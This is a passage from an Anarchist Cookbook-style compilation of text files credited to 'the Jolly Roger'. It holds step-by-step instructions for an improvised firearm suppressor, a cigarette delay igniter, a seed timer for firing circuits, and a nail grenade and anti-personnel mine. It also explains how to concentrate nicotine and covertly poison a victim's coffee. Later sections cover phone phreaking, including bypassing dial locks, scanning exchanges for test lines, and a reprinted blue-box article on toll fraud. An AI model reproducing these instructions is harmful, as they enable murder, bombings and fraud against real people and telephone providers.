3) Thread one of the pipe couplings on the drilled pipe nipple.4) Cut coupling length to allow barrel of weapon to thread fully into lowsignature system. Barrel should butt against end of the drilled pipenipple.5) Seperate the top half of the grenade container from the bottom half.6) Insert the pipe nipple in the drilled hole at the base of the bottomhalf of the container. Pack theabsorbent cotton inside the container andaround the pipe nipple.7) Pack the absorbent cotton in top half of grenade container leavinghole in center. Assemble container to the bottom half.8) Thread the other coupling onto the pipe nipple.
Note: A longer container and pipe nipple, with same "A" and "B"dimensions as those given, will furthur reduce the signature of thesystem.
How to use:----------
1) Thread the low signature system on the selected weapon securely.2) Place the proper cotton wad size into the muzzle end of the system(see table 2)3) Load weapon4) Weapon is now ready for use
TABLE 1 -- Low Signature System Dimensions------------------------------------------
(Coupling) Holes per (4 rows) A B C D Row Total------------------------------------------------------------------------.45 cal 3/8 1/4 3/8 3/8 12 48
.38 cal 3/8 1/4 1/4 1/4 12 48
9 mm 3/8 1/4 1/4 1/4 12 48
7.62 mm 3/8 1/4 1/4 1/4 12 48
.22 cal 1/4 5/32 1/8* 1/8 14 50------------------------------------------------------------------------ *Extra Heavy Pipe (All dimensions in inches)
TABLE 2 -- Cotton Wadding - Sizes---------------------------------
‡-------------------------------------------------Weapon Cotton Wadding Size-------------------------------------------------.45 cal 1-1/2 x 6 inches
.38 cal 1 x 4 inches
9 mm 1 x 4 inches
7.62 mm 1 x 4 inches
.22 cal Not needed-------------------------------------------------
------------------Jolly Roger
Delay Igniter from a Cigarette by the Jolly Roger
A simple and economical (everyone wants to save money haha) timedelay can be made with a common cigarette.
Materials Required:------------------
CigarettePaper matchString (shoelace or similar cord)Fuse cord (improvised or commercial)
Procedure:---------
1) Cut end of fuse cord at a slant to expose inner core2) Light cigarette in normal fashion. Place a paper match so that the hadis over exposed exposed end of fuse cord and tie both to the side of theburning cigarette with string.3) Position the burning cigarette with fuse so that it burns freely. Asuggested method is to hang the delay on a twig.
Note: Common dry cigarettes burn about 1 inch every 7 or 8 minutes instill air. (Now I am talking about all except American brands, which burnabout 1 inch every 4-5 minutes) If the fuse cord is place one inch fromthe burning end of the cigarette a time delay of 7 or 8 minutes willresult. Delay time will vary depending upon type of cigarette, wind,moisture, and other atmospherc conditions (get to know your cigarette!) To obtain accurate delay time, a test run should be made under"use" conditions.
----------------Jolly Roger
Nicotine by the Jolly Roger
Nicotine is an abundant poison. Easily found in tobaccoproducts, in concentrated form a few drops can quickly killsomeone. Here is how to concentrate it:
First get a can of chewing tobacco or pipe tobacco. Removethe contents and soak in water overnight in a jar (about 2/3 cupof water will do...). In the morning, strain into another jar themixture through a porous towel. Then wrap the towel around theball of tobacco and squeeze it until all of the liquid is in thejar. Throw away the tobacco--you will not need it anymore.
Now you have two options. I recommend the first. It makes thenicotine more potent. 1) Allow to evaporate until a sticky syrup results in thejar. This is almost pure nicotine (hell, it is pure enough forsure!). 2) Heat over low flame until water is evaporated and a thicksticky syrup results (I don't know how long it takes... shouldn'ttake too long, though.).
Now all you have to do, when you wish to use it, is to puta few drops in a medicine dropper or equivalent, and slip about 4or 5 drops into the victim's coffee. Coffee is recommended since itwill disguise the taste. Since nicotine is a drug, the victimshould get quite a buzz before they turn their toes up to thedaisies, so to speak.
Note: If the syrup is too sticky, dilute it with a few dropsof water. And while you are at it, better add an extra drop to thecoffee just to be sure!
----------------Jolly Roger
Dried Seed Timer by the Jolly Roger
A time delay device for electrical firing circuits can be made usingthe principle of expansion of dried seeds.
Material Required:-----------------
Dried peas, beans, or oter dehydrated seedsWide-mouth glass jar with non-metal capTwo screws or boltsThin metal plateHand drillScrewdriver
Procedure:---------1) Determine the rate of the rise of the dried seeds selected. This isnecessary to determine the delay time of the timer. a) Place a sample of the dried seeds in the jar and cover with water. b) Measure the time it takes for the seeds to rise a given height. Most dried seeds increase 50% in one to two hours.2) Cut a disc from thin metal plate. Disc should fit loosely inside thejar.
NOTE: If metal is painted, rusty, or otherwise coated, it must be scrapedor sanded to obtain a clean metal surface
‡3) Drill two holes in the cap of the jar about 2 inches apart. Diameterof holes should be such that screws or bolts will thread tightly intothem. If the jar has a metal cap or no cap, a piece of wood or plastic(NOT METAL) can be used as a cover.4) Turn the two screws or bolts through the holes in the cap. Boltsshould extend about one in. (2 1/2 cm) into the jar.
IMPORTANT: Both bolts must extend the same distance below the containercover.
5) Pour dried seeds into the container. The level will depend upon thepreviously measured rise time and the desired delay.6) Place the metal disc in the jar on top of the seeds.
How to use:----------
1) Add just enough water to completely cover the seeds and place the capon the jar.2) Attach connecting wires from the firing circuit to the two screws onthe cap.
Expansion of the seeds will raise the metal disc until it contacts thescrews and closes the circuit.
---------------------Jolly Roger
Nail Grenade by the Jolly Roger
Effective fragmentation grenades can be made from a block of tnt orother blasting explosive and nails.
Material Required:-----------------
Block of TNT or other blasting explosiveNailsNon-electric (military or improvised) blasting capFuse CordTape, string, wire, or glue
Procedure:---------
1) If an explosive charge other than a standard TNT block is used, make ahole in the center of the charge for inserting the blasting cap. TNT canbe drilled with relative safety. With plastic explosives, a hole can bemade by pressing a round stick into the center of the charge. The holeshould be deep enough that the blasting cap is totally within theexplosive.2) Tape, tie, or glue one or two rows of closely packed nails to thesides of the explosive block. Nails should completely cover the foursurfaces of the block.3) Place blasting cap on one end of the fuse cord and crimp with pliers.
NOTE: To find out how long the fuse cord should be, check the time ittakes a known length to burn. If 12 inches (30 cm) burns for 30 seconds,
a 10 second delay will require a 4 inch (10 cm) fuse.
4) Insert the blasting cap in the hole in the block of explosive. Tape ortie fuse cord securly in place so that it will not fall out when thegrenade is thrown.
Alternate Use:-------------
An effective directional anti-personnel mine can be made by placing nailson only one side of the explosive block. For thi case, and electricblasting cap can be used.
------------------Jolly Roger
The Bell Glossary courtesy of the Jolly Roger
...................................................................... ...................................................................... . The Bell Glossary - .. . by .. . /\<\ /\<\ .. . \>ad \>arvin .. ...................................................................... ......................................................................
ACD: Automatic Call Distributor - A system that automatically distributescallsto operator pools (providing services such as intercept and directoryassistance), to airline ticket agents, etc.
Administration: The tasks of record-keeping, monitoring, rearranging,prediction need for growth, etc.
AIS: Automatic Intercept System - A system employing an audio-response unitunder control of a processor to automatically provide pertinent info tocallersrouted to intercept.
Alert: To indicate the existence of an incoming call, (ringing).
ANI: Automatic Number Identification - Often pronounced "Annie," a facilityforautomatically identify the number of the calling party for chargingpurposes.
Appearance: A connection upon a network terminal, as in "the line has twonetwork appearances."
Attend: The operation of monitoring a line or an incoming trunk foroff-hook orseizure, respectively.
Audible: The subdued "image" of ringing transmitted to the calling partyduringringing; not derived from the actual ringing signal in later systems.
Backbone Route: The route made up of final-group trunks between end officesindifferent regional center areas.
BHC: Busy Hour Calls - The number of calls placed in the busy hour.
Blocking: The ratio of unsuccessful to total attempts to use a facility;expresses as a probability when computed a priority.
Blocking Network: A network that, under certain conditions, may be unabletoform a transmission path from one end of the network to the other. Ingeneral,all networks used within the Bell Systems are of the blocking type.
Blue Box: Equipment used fraudulently to synthesize signals, gaining accesstothe toll network for the placement of calls without charge.
BORSCHT Circuit: A name for the line circuit in the central office. Itfunctions as a mnemonic for the functions that must be performed by thecircuit: Battery, Overvoltage, Ringing, Supervision, Coding, Hybrid, andTesting.
Busy Signal: (Called-line-busy) An audible signal which, in the BellSystem,comprises 480hz and 620hz interrupted at 60IPM.
Bylink: A special high-speed means used in crossbar equipment for routingcallsincoming from a step-by-step office. Trunks from such offices are oftenreferred to as "bylink" trunks even when incoming to noncrossbar offices;theyare more properly referred to as "dc incoming trunks." Such high-speedmeansare necessary to assure that the first incoming pulse is not lost.
Cable Vault: The point which phone cable enters the Central Officebuilding.
CAMA: Centralized Automatic Message Accounting - Pronounced like Alabama.
CCIS: Common Channel Interoffice Signaling - Signaling information fortrunkconnections over a separate, nonspeech data link rather that over thetrunksthemselves.
CCITT: International Telegraph and Telephone Consultative Committee- AnInternational committee that formulates plans and sets standards forintercountry communication means.
CDO: Community Dial Office - A small usually rural office typically servedbystep-by-step equipment.
CO: Central Office - Comprises a switching network and its control andsupport
equipment. Occasionally improperly used to mean "office code."
Centrex: A service comparable in features to PBX service but implementedwithsome (Centrex CU) or all (Centrex CO) of the control in the central office.Inthe later case, each station's loop connects to the central office.
Customer Loop: The wire pair connecting a customer's station to the centraloffice.
DDD: Direct Distance Dialing - Dialing without operator assistance over thenationwide intertoll network.
Direct Trunk Group: A trunk group that is a direct connection between agivenoriginating and a given terminating office.
EOTT: End Office Toll Trunking - Trunking between end offices in differenttollcenter areas.
ESB: Emergency Service Bureau - A centralized agency to which 911"universal"emergency calls are routed.
ESS: Electronic Switching System - A generic term used to identify as aclass,stored-program switching systems such as the Bell System's No.1 No.2, No.3,No.4, or No.5.
ETS: Electronic Translation Systems - An electronic replacement for thecardtranslator in 4A Crossbar systems. Makes use of the SPC 1A Processor.
False Start: An aborted dialing attempt.
Fast Busy: (often called reorder) - An audible busy signal interrupted attwicethe rate of the normal busy signal; sent to the originating station toindicatethat the call blocked due to busy equipment.
Final Trunk Group: The trunk group to which calls are routed when availablehigh-usage trunks overflow; these groups generally "home" on an office nexthighest in the hierarchy.
Full Group: A trunk group that does not permit rerouting off-contingentforeigntraffic; there are seven such offices.
Glare: The situation that occurs when a two-way trunk is seized more orlesssimultaneously at both ends.
High Usage Trunk Group: The appellation for a trunk group that hasalternateroutes via other similar groups, and ultimately via a final trunk group to
ahigher ranking office.
Intercept: The agency (usually an operator) to which calls are routed whenmadeto a line recently removed from a service, or in some other categoryrequiringexplanation. Automated versions (ASI) with automatic voiceresponse unitsaregrowing in use.
Interrupt: The interruption on a phone line to disconnect and connect withanother station, such as an Emergence Interrupt.
Junctor: A wire or circuit connection between networks in the same office.Thefunctional equivalent to an intraoffice trunk.
MF: Multifrequency - The method of signaling over a trunk making use of thesimultaneous application of two out of six possible frequencies.
NPA: Numbering Plan Area.
ONI: Operator Number Identification - The use of an operator in a CAMAofficeto verbally obtain the calling number of a call originating in an officenotequipped with ANI.
PBX: Private Branch Exchange - (PABX: Private Automatic Branch Exchange) Antelephone office serving a private customer, Typically , access to theoutsidetelephone network is provided.
Permanent Signal: A sustained off-hook condition without activity (nodialingor ringing or completed connection); such a condition tends to tie upequipment, especially in earlier systems. Usually accidental, but sometimesused intentionally by customers in high-crime-rate areas to thwart offburglars.
POTS: Plain Old Telephone Service - Basic service with no extra "frills".
ROTL: Remote Office Test Line - A means for remotely testing trunks.
RTA: Remote Trunk Arrangement - An extension to the TSPS system permittingitsservices to be provided up to 200 miles from the TSPS site.
SF: Single Frequency. A signaling method for trunks: 2600hz is impresseduponidle trunks.
Supervise: To monitor the status of a call.
SxS: (Step-by-Step or Strowger switch) - An electromechanical office typeutilizing a gross-motion stepping switch as a combination network anddistributed control.
‡Talkoff: The phenomenon of accidental synthesis of a machine-intelligiblesignal by human voice causing an unintended response. "whistling a tone".
Trunk: A path between central offices; in general 2-wire for interlocal,4-wirefor intertoll.
TSPS: Traffic Service Position System - A system that provides, understored-program control, efficient operator assistance for toll calls. It does notswitch the customer, but provides a bridge connection to the operator.
X-bar: (Crossbar) - An electromechanical office type utilizing a"fine-motion"coordinate switch and a multiplicity of central controls (called markers).There are four varieties: No.1 Crossbar: Used in large urban office application; (1938) No 3 Crossbar: A small system started in (1974). No.4A/4M Crossbar: A 4-wire toll machine; (1943). No.5 Crossbar: A machine originally intended for relatively small suburban applications; (1948) Crossbar Tandem: A machine used for interlocal office switching.
Phone Dial Locks -- How to Beat'em courtesy of the Jolly Roger
Have you ever been in an office or somewhere and wanted to make a freephonecall but some asshole put a lock on the phone to prevent out-going calls?Fretno more phellow phreake, for every system can be beaten with a littleknowledge!
There are two ways to beat this obstacle, first pick the lock, I don'thavethe time to teach locksmithing so we go to the second method which takesadvantage of telephone electronics.
To be as simple as possibnle when you pick up the phone you complete acircuit known as a local loop. When you hang up you break the circuit.Whenyou dial (pulse) it also breaks the circuit but not long enough to hang up!Soyou can "Push-dial." To do this you >>> RAPIDLY <<<>>> RAPIDLY <<< & >>> EVENLY <<< depress the switchhook 10 times. To dial634-1268, depress 6 X'S pause, then 3 X'S, pause, then 4X'S, etc. It takesalittle practice but you'll get the hang of it. Try practicing with yourown #so you'll get a busy tone when right. It'll also work on touch-tone(tm)sincea DTMF line will also accept pulse. Also, never depress the switchhook formore than a second or it'll hang up!
Finally, remember that you have just as much right to that phone as the
asshole who put the lock on it!
(From the Official Phreaker's Guide)
Phone Dial Locks -- How to Beat'em courtesy of Exodus Have you ever been in an office or somewhere and wanted to make a free phonecall but some asshole put a lock on the phone to prevent out-going calls? Fretno more phellow phreake, for every system can be beaten with a little knowledge! There are two ways to beat this obstacle, first pick the lock, I don't havethe time to teach locksmithing so we go to the second method which takes advantage of telephone electronics. To be as simple as possibnle when you pick up the phone you complete a circuit known as a local loop. When you hang up you break the circuit. Whenyou dial (pulse) it also breaks the circuit but not long enough to hang up! So you can "Push-dial." To do this you >>> RAPIDLY <<<>>> RAPIDLY <<< & >>> EVENLY <<< depress the switchhook 10 times. To dial634-1268, depress 6 X'S pause, then 3 X'S, pause, then 4X'S, etc. It takes alittle practice but you'll get the hang of it. Try practicing with your own #so you'll get a busy tone when right. It'll also work on touch-tone(tm) sincea DTMF line will also accept pulse. Also, never depress the switchhook formore than a second or it'll hang up! Finally, remember that you have just as much right to that phone as theasshole who put the lock on it!Unrevised.. I have yet to see a "Dial-Lock".. Exodus (From the Official Phreaker's Guide)
Exchange Scanning courtesy of the Jolly Roger
Almost every exchange in the bell system has test #'s and other"goodies"such as loops with dial-ups. These "goodies" are usually found betweed 9900and 9999 in your local exchange. If you have the time and initiative, scanyour exchange and you may become lucky!
Here are some findings in the 914-268 exchange:
9900 - ANI9901 - ANI9927 - OSC. TONE (POSSIBLE TONE SIDE OF A LOOP)9936 - VOICE # TO THE TELCO CENTRAL OFFICE9937 - VOICE # TO THE TELCO CENTRAL OFFICE9941 - COMPUTER (DIGITAL VOICE TRANSMISSION?)9960 - OSC. TONE (TONE SIDE LOOP) MAY ALSO BE A COMPUTER IN SOME EXCHANGES9961 - NO RESPONSE (OTHER END OF LOOP?)9962 - NO RESPONSE (OTHER END OF LOOP?)9963 - NO RESPONSE (OTHER END OF LOOP?)9966 - COMPUTER (SEE 9941)9968 - TONE THAT DISAPPEARS--RESPONDS TO CERTAIN TOUCH-TONE KEYS
Most of the numbers between 9900 & 9999 will ring or go to a "what #,please?" operator.
(from the Official Phreaker's Manual)
A Short History of Phreaking courtesy of the Jolly Roger
Well now we know a little vocabulary, and now its into history, Phreakhistory. Back at MIT in 1964 arrived a student by the name of StewartNelson,who was extremely interested in the telephone. Before entering MIT, he hadbuilt autodialers, cheese boxes, and many more gadgets. But when he cametoMIT he became even more interested in "fone-hacking" as they called it.Aftera little while he naturally started using the PDP-1, the schools computeratthat time, and from there he decided that it would be interesting to seewhether the computer could generate the frequencies required for blueboxing.The hackers at MIT were not interested in ripping off Ma Bell, but justexploring the telephone network. Stew (as he was called) wrote a programtogenerate all the tones and set off into the vast network. Now there were more people phreaking than the ones at MIT. Most peoplehave
heard of Captain Crunch (No not the cereal), he also discovered how to takerides through the fone system, with the aid of a small whistle found in acereal box (can we guess which one?). By blowing this whistle, hegeneratedthe magical 2600hz and into the mouthpiece it sailed, giving him completecontrol over the system. I have heard rumors that at one time he madeabout1/4 of the calls coming out of San Francisco. He got famous fast. He madethecover of people magazine and was interviewed several times (as you'll soonsee). Well he finally got caught after a long adventurous career. Afterhewas caught he was put in jail and was beaten up quite badly because hewouldnot teach other inmates how to box calls. After getting out, he joinedApplecomputer and is still out there somewhere. Then there was Joe the Whistler, blind form the day he was born. Hecouldwhistle a perfect 2600hz tone. It was rumored phreaks used to call him totunetheir boxes. Well that was up to about 1970, then from 1970 to 1979, phreaking wasmainlydone by college students, businessmen and anyone who knew enough aboutelectronics and the fone company to make a 555 Ic to generate those magictones. Businessmen and a few college students mainly just blue box to getfreecalls. The others were still there, exploring 800#'s and the new ESSsystems.ESS posed a big problem for phreaks then and even a bigger one now. ESSwasnot widespread, but where it was, blue boxing was next to impossible exceptforthe most experienced phreak. Today ESS is installed in almost all majorcitiesand blue boxing is getting harder and harder. 1978 marked a change in phreaking, the Apple ][, now a computer that wasaffordable, could be programmed, and could save all that precious work on acassette. Then just a short while later came the Apple Cat modem. Withthismodem, generating all blue box tones was easy as writing a program to countform one to ten (a little exaggerated). Pretty soon programs that couldimitate an operator just as good as the real thing were hitting thecommunity,TSPS and Cat's Meow, are the standard now and are the best. 1982-1986: LD services were starting to appear in mass numbers. Peoplenowhad programs to hack LD services, telephone exchanges, and even passwords.Bynow many phreaks were getting extremely good and BBS's started to spring upeverywhere, each having many documentations on phreaking for the novice.Thenit happened, the movie War Games was released and mass numbers of sixthgradeto all ages flocked to see it. The problem wasn't that the movie was bad,itwas that now EVERYONE wanted to be a hacker/phreak. Novices came out in
suchmass numbers, that bulletin boards started to be busy 24 hours a day. Tothisday, they still have not recovered. Other problems started to occur,novicesguessed easy passwords on large government computers and started to playaround... Well it wasn't long before they were caught, I think that manypeople remember the 414-hackers. They were so stupid as to say "yes" whenthecomputer asked them whether they'd like to play games. Well at least ittakesthe heat off the real phreaks/hacker/krackers.
(from the Official Phreaker's Manual)
-----> Courtesy of the Jolly Roger<-----
***** The AAG Proudly Presents The AAG Proudly Presents ***** * * * +----------------------------------------------+ * * * * Secrets of the Little Blue Box * * * * by Ron Rosenbaum * * Typed by One Farad Cap/AAG * * * * -A story so incredible it may even make you * * feel sorry for the phone company- * * * * (First of four files) * * * * +----------------------------------------------+ * * * ***** The AAG Proudly Presents The AAG Proudly Presents *****
Dudes... These four files contain the story, "Secrets of the Little BlueBox",by Ron Rosenbaum.
-A story so incredible it may even make you feel sorry for the phonecompany-
Printed in the October 1971 issue of Esquire Magazine. If you happen to beina library and come across a collection of Esquire magazines, the October1971issue is the first issue printed in the smaller format. The story beginsonpage 116 with a picture of a blue box. --One Farad Cap, Atlantic AnarchistGuild
The Blue Box Is Introduced: Its Qualities Are Remarked
I am in the expensively furnished living room of Al Gilbertson (His realnamehas been changed.), the creator of the "blue box." Gilbertson is holding
one ofhis shiny black-and-silver "blue boxes" comfortably in the palm of hishand,pointing out the thirteen little red push buttons sticking up from theconsole.He is dancing his fingers over the buttons, tapping out discordant beepingelectronic jingles. He is trying to explain to me how his little blue boxdoesnothing less than place the entire telephone system of the world,satellites,cables and all, at the service of the blue-box operator, free of charge.
"That's what it does. Essentially it gives you the power of a superoperator.You seize a tandem with this top button," he presses the top button withhisindex finger and the blue box emits a high-pitched cheep, "and like that"--cheep goes the blue box again -- "you control the phone company'slong-distanceswitching systems from your cute little Princes phone or any old pay phone.And you've got anonymity. An operator has to operate from a definitelocation:the phone company knows where she is and what she's doing. But with yourbeeper box, once you hop onto a trunk, say from a Holiday Inn 800(toll-free)number, they don't know where you are, or where you're coming from, theydon'tknow how you slipped into their lines and popped up in that 800 number.Theydon't even know anything illegal is going on. And you can obscure youroriginsthrough as many levels as you like. You can call next door by way of WhitePlains, then over to Liverpool by cable, and then back here by satellite.Youcan call yourself from one pay phone all the way around the world to a payphone next to you. And you get your dime back too."
"And they can't trace the calls? They can't charge you?""Not if you do it the right way. But you'll find that the free-call thingisn't really as exciting at first as the feeling of power you get fromhavingone of these babies in your hand. I've watched people when they first getholdof one of these things and start using it, and discover they can makeconnections, set up crisscross and zigzag switching patterns back and forthacross the world. They hardly talk to the people they finally reach. Theysayhello and start thinking of what kind of call to make next. They go alittlecrazy." He looks down at the neat little package in his palm. His fingersarestill dancing, tapping out beeper patterns.
"I think it's something to do with how small my models are. There are lotsofblue boxes around, but mine are the smallest and most sophisticatedelectronically. I wish I could show you the prototype we made for our big
syndicate order."
He sighs. "We had this order for a thousand beeper boxes from a syndicatefront man in Las Vegas. They use them to place bets coast to coast, keeplinesopen for hours, all of which can get expensive if you have to pay. Thedealwas a thousand blue boxes for $300 apiece. Before then we retailed them for$1500 apiece, but $300,000 in one lump was hard to turn down. We had amanufacturing deal worked out in the Philippines. Everything ready to go.Anyway, the model I had ready for limited mass production was small enoughtofit inside a flip-top Marlboro box. It had flush touch panels for akeyboard,rather than these unsightly buttons, sticking out. Looked just like a tinyportable radio. In fact, I had designed it with a tiny transistor receivertoget one AM channel, so in case the law became suspicious the owner couldswitchon the radio part, start snapping his fingers, and no one could tellanythingillegal was going on. I thought of everything for this model -- I had itlinedwith a band of thermite which could be ignited by radio signal from a tinybutton transmitter on your belt, so it could be burned to ashes instantlyincase of a bust. It was beautiful. A beautiful little machine. You shouldhave seen the faces on these syndicate guys when they came back aftertrying itout. They'd hold it in their palm like they never wanted to let it go, andthey'd say, 'I can't believe it. I can't believe it.' You probably won'tbelieve it until you try it."
The Blue Box Is Tested: Certain Connections Are Made
About eleven o'clock two nights later Fraser Lucey has a blue box in thepalmof his left hand and a phone in the palm of his right. He is standinginside aphone booth next to an isolated shut-down motel off Highway 1. I amstandingoutside the phone booth.
Fraser likes to show off his blue box for people. Until a few weeks agowhenPacific Telephone made a few arrests in his city, Fraser Lucey liked tobringhis blue box (This particular blue box, like most blue boxes, is not blue.Blue boxes have come to be called "blue boxes" either because 1) The firstbluebox ever confiscated by phone-company security men happened to be blue, or2)To distinguish them from "black boxes." Black boxes are devices, usually aresistor in series, which, when attached to home phones, allow all incomingcalls to be made without charge to one's caller.) to parties. It neverfailed:a few cheeps from his device and Fraser became the center of attention atthe
very hippest of gatherings, playing phone tricks and doing request numbersforhours. He began to take orders for his manufacturer in Mexico. He becameadealer.
Fraser is cautious now about where he shows off his blue box. But he nevergets tired of playing with it. "It's like the first time every time," hetellsme.
Fraser puts a dime in the slot. He listens for a tone and holds thereceiverup to my ear. I hear the tone. Fraser begins describing, with a certainpracticed air, what he does while he does it. "I'm dialing an 800 numbernow.Any 800 number will do. It's toll free. Tonight I think I'll use the -----(henames a well-know rent-a-car company) 800 number. Listen, It's ringing.Here,you hear it? Now watch." He places the blue box over the mouthpiece ofthephone so that the one silver and twelve black push buttons are facing uptowardme. He presses the silver button -- the one at the top -- and I hear thathigh-pitched beep. "That's 2600 cycles per second to be exact," says Lucey."Now, quick. listen." He shoves the earpiece at me. The ringing hasvanished.The line gives a slight hiccough, there is a sharp buzz, and then nothingbutsoft white noise.
"We're home free now," Lucey tells me, taking back the phone and applyingtheblue box to its mouthpiece once again. "We're up on a tandem, into along-lines trunk. Once you're up on a tandem, you can send yourselfanywhereyou want to go." He decides to check out London first. He chooses acertainpay phone located in Waterloo Station. This particular pay phone ispopularwith the phone-phreaks network because there are usually people walking byatall hours who will pick it up and talk for a while.
He presses the lower left-hand corner button which is marked "KP" on thefaceof the box. "That's Key Pulse. It tells the tandem we're ready to give itinstructions. First I'll punch out KP 182 START, which will slide us intotheoverseas sender in White Plains." I hear a neat clunk-cheep. "I thinkwe'llhead over to England by satellite. Cable is actually faster and theconnectionis somewhat better, but I like going by satellite. So I just punch out KPZero44. The Zero is supposed to guarantee a satellite connection and 44 is thecountry code for England. Okay... we're there. In Liverpool actually.
Nowall I have to do is punch out the London area code which is 1, and dial upthepay phone. Here, listen, I've got a ring now."
I hear the soft quick purr-purr of a London ring. Then someone picks upthephone.
"Hello," says the London voice.
"Hello. Who's this?" Fraser asks.
"Hello. There's actually nobody here. I just picked this up while I waspassing by. This is a public phone. There's no one here to answeractually."
"Hello. Don't hang up. I'm calling from the United States."
"Oh. What is the purpose of the call? This is a public phone you know."
"Oh. You know. To check out, uh, to find out what's going on in London.Howis it there?"
"Its five o'clock in the morning. It's raining now."
"Oh. Who are you?"
The London passerby turns out to be an R.A.F. enlistee on his way back tothebase in Lincolnshire, with a terrible hangover after a thirty-six-hourpass.He and Fraser talk about the rain. They agree that it's nicer when it'snotraining. They say good-bye and Fraser hangs up. His dime returns with aniceclink.
"Isn't that far out," he says grinning at me. "London, like that."
Fraser squeezes the little blue box affectionately in his palm. "I told yathis thing is for real. Listen, if you don't mind I'm gonna try this girlIknow in Paris. I usually give her a call around this time. It freaks herout.This time I'll use the ------ (a different rent-a-car company) 800 numberandwe'll go by overseas cable, 133; 33 is the country code for France, the 1sendsyou by cable. Okay, here we go.... Oh damn. Busy. Who could she betalkingto at this time?"
A state police car cruises slowly by the motel. The car does not stop, butFraser gets nervous. We hop back into his car and drive ten miles in theopposite direction until we reach a Texaco station locked up for the night.We
pull up to a phone booth by the tire pump. Fraser dashes inside and triestheParis number. It is busy again.
"I don't understand who she could be talking to. The circuits may be busy.It's too bad I haven't learned how to tap into lines overseas with thisthingyet."
Fraser begins to phreak around, as the phone phreaks say. He dials aleadingnationwide charge card's 800 number and punches out the tones that bringhimthe time recording in Sydney, Australia. He beeps up the weather recordinginRome, in Italian of course. He calls a friend in Boston and talks about acertain over-the-counter stock they are into heavily. He finds the Parisnumber busy again. He calls up "Dial a Disc" in London, and we listen toDouble Barrel by David and Ansil Collins, the number-one hit of the week inLondon. He calls up a dealer of another sort and talks in code. He callsupJoe Engressia, the original blind phone-phreak genius, and pays hisrespects.There are other calls. Finally Fraser gets through to his young lady inParis.
They both agree the circuits must have been busy, and criticize the Paristelephone system. At two-thirty in the morning Fraser hangs up, pocketshisdime, and drives off, steering with one hand, holding what he calls his"lovelylittle blue box" in the other.
You Can Call Long Distance For Less Than You Think
"You see, a few years ago the phone company made one big mistake,"Gilbertsonexplains two days later in his apartment. "They were careless enough toletsome technical journal publish the actual frequencies used to create alltheirmulti-frequency tones. Just a theoretical article some Bell TelephoneLaboratories engineer was doing about switching theory, and he listed thetonesin passing. At ----- (a well-known technical school) I had been foolingaroundwith phones for several years before I came across a copy of the journal intheengineering library. I ran back to the lab and it took maybe twelve hoursfromthe time I saw that article to put together the first working blue box. Itwasbigger and clumsier than this little baby, but it worked."
It's all there on public record in that technical journal written mainly byBell Lab people for other telephone engineers. Or at least it was public."Just try and get a copy of that issue at some engineering-school librarynow.
Bell has had them all red-tagged and withdrawn from circulation,"Gilbertsontells me.
"But it's too late. It's all public now. And once they became public thetechnology needed to create your own beeper device is within the range ofanytwelve-year-old kid, any twelve-year-old blind kid as a matter of fact.And hecan do it in less than the twelve hours it took us. Blind kids do it allthetime. They can't build anything as precise and compact as my beeper box,buttheirs can do anything mine can do."
"How?"
"Okay. About twenty years ago A.T.&T. made a multi-billion-dollar decisiontooperate its entire long-distance switching system on twelve electronicallygenerated combinations of twelve master tones. Those are the tones yousometimes hear in the background after you've dialed a long-distancenumber.They decided to use some very simple tones -- the tone for each number isjusttwo fixed single-frequency tones played simultaneously to create a certainbeatfrequency. Like 1300 cycles per second and 900 cycles per second playedtogether give you the tone for digit 5. Now, what some of these phonephreakshave done is get themselves access to an electric organ. Any cheap familyhome-entertainment organ. Since the frequencies are public knowledge now--one blind phone phreak has even had them recorded in one of the talkingbooksfor the blind -- they just have to find the musical notes on the organwhichcorrespond to the phone tones. Then they tape them. For instance, to getMaBell's tone for the number 1, you press down organ keys F~5 and A~5 (900and700 cycles per second) at the same time. To produce the tone for 2 it'sF~5and C~6 (1100 and 700 c.p.s). The phone phreaks circulate the whole listofnotes so there's no trial and error anymore."
He shows me a list of the rest of the phone numbers and the two electricorgankeys that produce them.
"Actually, you have to record these notes at 3 3/4 inches-per-second tapespeedand double it to 7 1/2 inches-per-second when you play them back, to gettheproper tones," he adds.
"So once you have all the tones recorded, how do you plug them into the
phonesystem?"
"Well, they take their organ and their cassette recorder, and start bangingoutentire phone numbers in tones on the organ, including country codes,routinginstructions, 'KP' and 'Start' tones. Or, if they don't have an organ,someonein the phone-phreak network sends them a cassette with all the tonesrecorded,with a voice saying 'Number one,' then you have the tone, 'Number two,'thenthe tone and so on. So with two cassette recorders they can put together aseries of phone numbers by switching back and forth from number to number.Anyidiot in the country with a cheap cassette recorder can make all the freecallshe wants."
"You mean you just hold the cassette recorder up the mouthpiece and switchin aseries of beeps you've recorded? The phone thinks that anything that makesthese tones must be its own equipment?"
"Right. As long as you get the frequency within thirty cycles per secondofthe phone company's tones, the phone equipment thinks it hears its ownvoicetalking to it. The original granddaddy phone phreak was this blind kidwithperfect pitch, Joe Engressia, who used to whistle into the phone. Anoperatorcould tell the difference between his whistle and the phone company'selectronic tone generator, but the phone company's switching circuit can'ttellthem apart. The bigger the phone company gets and the further away fromhumanoperators it gets, the more vulnerable it becomes to all sorts of phonephreaking."
A Guide for the Perplexed
"But wait a minute," I stop Gilbertson. "If everything you do sounds likephone-company equipment, why doesn't the phone company charge you for thecallthe way it charges its own equipment?"
"Okay. That's where the 2600-cycle tone comes in. I better start from thebeginning."
The beginning he describes for me is a vision of the phone system of thecontinent as thousands of webs, of long-line trunks radiating from each ofthehundreds of toll switching offices to the other toll switching offices.Eachtoll switching office is a hive compacted of thousands of long-distancetandems
constantly whistling and beeping to tandems in far-off toll switchingoffices.
The tandem is the key to the whole system. Each tandem is a line with somerelays with the capability of signalling any other tandem in any other tollswitching office on the continent, either directly one-to-one or byprogramminga roundabout route through several other tandems if all the direct routesarebusy. For instance, if you want to call from New York to Los Angeles andtraffic is heavy on all direct trunks between the two cities, your tandeminNew York is programmed to try the next best route, which may send you downto atandem in New Orleans, then up to San Francisco, or down to a New Orleanstandem, back to an Atlanta tandem, over to an Albuquerque tandem andfinally upto Los Angeles.
When a tandem is not being used, when it's sitting there waiting forsomeone tomake a long-distance call, it whistles. One side of the tandem, the side"facing" your home phone, whistles at 2600 cycles per second toward all thehome phones serviced by the exchange, telling them it is at their service,should they be interested in making a long-distance call. The other sideofthe tandem is whistling 2600 c.p.s. into one or more long-distance trunklines,telling the rest of the phone system that it is neither sending norreceiving acall through that trunk at the moment, that it has no use for that trunk atthemoment.
